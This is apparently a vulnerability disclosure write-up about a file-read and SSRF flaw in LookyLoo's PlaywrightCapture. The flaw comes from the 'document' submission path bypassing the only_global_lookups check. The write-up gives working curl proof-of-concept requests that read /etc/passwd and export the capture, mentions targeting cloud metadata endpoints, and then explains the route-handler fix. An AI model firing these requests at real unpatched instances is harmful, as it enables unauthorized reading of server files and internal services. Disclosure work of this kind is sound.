Two Input Paths, One Security Check: File Read in LookyLoo's PlaywrightCapture

LookyLoo is a web page capture and analysis tool maintained by CIRCL, the Luxembourg CERT. Security teams and CERTs use it to archive and inspect suspicious web pages: phishing sites, malware distribution pages, scam infrastructure. Under the hood, it uses PlaywrightCapture to drive a headless Chromium browser.

While reviewing the capture functionality, I found that one of the submission parameters completely bypassed the only_global_lookups security setting, allowing unauthenticated arbitrary file reads from the server filesystem.

Two ways to submit a capture

LookyLoo's /submit endpoint accepts two input modes:

url: a remote URL to capture. The browser navigates to it, and only_global_lookups restricts access to public IP addresses.
document: base64-encoded HTML content. LacusCore writes this to a temporary file and opens it as a file:// URL in the browser.

The only_global_lookups check only applied to the url code path. When document was provided, the code took a different branch and the security check was never evaluated.

What this means in practice

When a capture is submitted with document, LacusCore decodes the base64 HTML, writes it to disk, and passes the resulting file:///tmp/.../document.html path to Playwright's page.goto(). The headless browser now operates from a file:// origin.

JavaScript within the document can navigate the browser to any other local file:

<script>window.location.href = "file:///etc/passwd";</script>

This works because the navigation originates from a file:// origin (same-scheme), the browser context is created with bypass_csp=True (disabling Content Security Policy enforcement), and there were no Playwright route handlers registered to intercept secondary navigations. The file contents render in the browser and end up in all output artifacts: screenshots, saved HTML, and the HAR file.

The attack

The /submit endpoint requires no authentication on most deployments. A single request is sufficient:

curl -s -X POST "https://INSTANCE/submit" \
  -H "Content-Type: application/json" \
  -d '{
    "document": "'$(echo '<html><body><script>
      window.location.href="file:///etc/passwd";
    </script></body></html>' | base64 -w0)'",
    "document_name": "test.html",
    "init_script": "setTimeout(function(){
      document.title = document.body.innerText.substring(0, 500);
    }, 1500);"
  }'

The init_script parameter (also accepted without authentication) injects JavaScript that copies the file contents into the page title, making extraction possible without even downloading the full capture archive.

After the capture completes (about 30 seconds), the results can be retrieved:

curl -s "https://INSTANCE/tree/<uuid>/export" -o capture.zip

The HAR file inside the archive contains the full response body of the file:// request.

Beyond local files

The same technique works for internal network resources. Instead of file://, the injected JavaScript can target cloud instance metadata endpoints (http://169.254.169.254/latest/meta-data/), internal web services, or loopback services. These requests are made by the headless browser on the server, making this a server-side request forgery with full response capture.

The fix

The primary fix was committed in 49e289e by the CIRCL team, with follow-up hardening in subsequent commits.

The fix adds Playwright route handlers that intercept every browser request after initial navigation. The approach is similar to how Puppeteer's page.setRequestInterception() works, but using Playwright's route API:

async def catch_file_route(route: Route, request: Request) -> None:
    if unquote(request.url) == url:
        await route.continue_()   # the URL being captured, allow it
    else:
        self.logger.warning(f"Attempt to open a local file: {request.url}")
        await route.fulfill(status=404, content_type="text/plain",
                          body=f"Attempted to open {request.url}, blocked.")

async def catch_local_route(route: Route, request: Request) -> None:
    if request.url == url:
        await route.continue_()
    else:
        _url = Url(request.url)
        try:
            ip = ipaddress.ip_address(_url.host.try_into_ip())
            if ip.is_global:
                return await route.continue_()
            return await route.fulfill(status=404, ...)
        except ValueError:
            pass
        hostname = _url.host.try_into_hostname()
        if str(hostname) == 'localhost':
            return await route.fulfill(status=404, ...)
        if hostname.suffix and str(hostname.suffix) == 'local':
            return await route.fulfill(status=404, ...)
        return await route.continue_()

The routes are registered when only_global_lookup is enabled (the default):

if self.only_global_lookup:
    await page.route("**/*", handler=catch_local_route)
    await page.route("file:**/*", handler=catch_file_route)
    await page.route("blob:**/*", lambda route: route.continue_())
    await page.route("filesystem:**/*", lambda route: route.continue_())

Non-global IPs are classified using Python's ipaddress.is_global, which covers loopback, private, link-local, and multicast ranges. Browser-internal schemes like blob:// and filesystem:// are explicitly allowed since they don't access real OS resources. Follow-up commits (17182e0, 187a39f) addressed additional edge cases: chrome-extension:// URLs, localhost as a hostname, and correct route registration order (Playwright processes routes LIFO).

What makes this interesting

The only_global_lookups control was built specifically to prevent this class of attack. It existed, it was enabled by default, and it worked correctly on the url path. But the document parameter, which by design opens content from a file:// origin, took a completely separate code path that bypassed it entirely.

This is a pattern worth looking for in any application with multiple input paths that converge on the same sensitive operation. If there are two ways to trigger a capture, both need the same restrictions. Security controls applied to one input mode but not to a functionally equivalent alternative are easy to miss during code review, because the protection appears to be in place.

For anyone building browser-based capture or rendering tools: the initial URL is just the starting point. JavaScript running within the rendered page can trigger navigations, fetch requests, and resource loads to arbitrary destinations. Request-level interception (Playwright's page.route(), Puppeteer's page.setRequestInterception()) applied to all secondary requests is not optional.